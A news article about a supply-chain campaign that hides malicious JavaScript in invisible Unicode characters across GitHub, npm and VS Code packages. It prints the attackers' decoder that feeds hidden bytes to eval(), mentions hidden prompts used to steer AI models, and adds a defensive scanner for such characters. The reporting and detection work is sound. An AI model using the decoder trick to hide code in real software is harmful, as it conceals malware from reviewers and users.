Supply-chain attack employing invisible code hits GitHub and other repositories

by admin
The unseen code relies on Private Use Areas (sometimes called Private Use Access), which are ranges in the Unicode specification for characters reserved for private use when defining emojis, flags, and other symbols. Those code points correspond to every letter of the US alphabet when interpreted by computers, yet their output is entirely invisible to people. Reviewers of source or users of static analysis tools encounter only whitespace or empty lines. To a JavaScript interpreter, the same code points represent executable instructions.

The invisible Unicode characters were created decades ago and then mostly forgotten — until 2024, when attackers started using them to hide malicious prompts sent to AI engines. Although the text remained unseen by humans and many scanners, large language models could read the characters and obey the hidden instructions. AI platforms have deployed safeguards to limit use of these characters, but those protections are occasionally bypassed.

After that, the Unicode trick began appearing in more conventional malware campaigns. In one package Aikido examined in Friday’s write-up, attackers encoded a malicious payload with invisible characters. A cursory look at the code reveals nothing; during JavaScript execution, however, a tiny decoder reconstructs the actual bytes and feeds them to eval().

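// Map each invisible code point to a byte value and drop everything else:
//   U+FE00..U+FE0F   -> 0..15
//   U+E0100..U+E01EF -> 16..255
const s = v => [...v].map(w => (
  w = w.codePointAt(0),
  w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
  w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
)).filter(n => n !== null);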


eval(Buffer.from(s(``)).toString('utf-8'));

“The backtick string passed to s() looks empty in every viewer, but it’s packed with invisible characters that, once decoded, produce a full malicious payload,” Aikido explained. “In past incidents, that decoded payload fetched and executed a second-stage script using Solana as a delivery channel, capable of stealing tokens, credentials, and secrets.”
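A review-side counterpart to the decoder above, added here as an example (it is not code from Aikido or from the original write-up): it scans source text for runs of the two code-point ranges the decoder checks (U+FE00–U+FE0F and U+E0100–U+E01EF, the Unicode variation selector blocks) and decodes each run to text for triage without executing it. The names `findHiddenRuns` and `MIN_RUN`, the threshold value, and the sample input are assumptions made for this illustration.

```javascript
// Added example: flag runs of invisible variation selectors in source text
// and decode them for inspection. Nothing here is passed to eval().
const isSelector = cp =>
  (cp >= 0xFE00 && cp <= 0xFE0F) || (cp >= 0xE0100 && cp <= 0xE01EF);

// Same mapping as the decoder: U+FE00..FE0F -> 0..15, U+E0100..E01EF -> 16..255.
const toByte = cp => (cp <= 0xFE0F ? cp - 0xFE00 : cp - 0xE0100 + 16);

// Assumed threshold: legitimate text puts a single selector after a visible
// base character (for example U+FE0F on an emoji), not a long run of them.
const MIN_RUN = 4;

function findHiddenRuns(source, minRun = MIN_RUN) {
  const findings = [];
  source.split('\n').forEach((text, i) => {
    let run = [];
    const flush = () => {
      if (run.length >= minRun) {
        findings.push({
          line: i + 1,
          length: run.length,
          decoded: Buffer.from(run.map(toByte)).toString('utf-8'),
        });
      }
      run = [];
    };
    // for...of walks code points, so supplementary-plane selectors stay whole.
    for (const ch of text) {
      const cp = ch.codePointAt(0);
      if (isSelector(cp)) run.push(cp); else flush();
    }
    flush();
  });
  return findings;
}

// Constructed sample: line 1 carries an ordinary emoji selector; line 2 hides
// the harmless bytes "harmless" in a template literal that looks empty.
const sample = [
  'const ok = "\u2764\uFE0F";',
  'eval(Buffer.from(s(`\u{E0158}\u{E0151}\u{E0162}\u{E015D}\u{E015C}\u{E0155}\u{E0163}\u{E0163}`)).toString("utf-8"));',
].join('\n');

console.log(findHiddenRuns(sample));
```

A run that is split across lines is reported as separate shorter runs, so a lower threshold or whole-file matching suits files where that matters.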

Since discovering the recent set of packages on GitHub, researchers have spotted similar items on npm and the VS Code marketplace. Aikido noted the 151 identified packages are probably only a portion of the campaign, as many were removed after being uploaded.

The most effective defense against supply-chain attacks remains careful inspection of packages and their dependencies before adding them to projects. That means checking package names closely and searching for misspellings. If concerns about LLM-assisted concealment are valid, malicious packages may increasingly masquerade as legitimate ones, especially when invisible Unicode characters are used to hide harmful payloads.
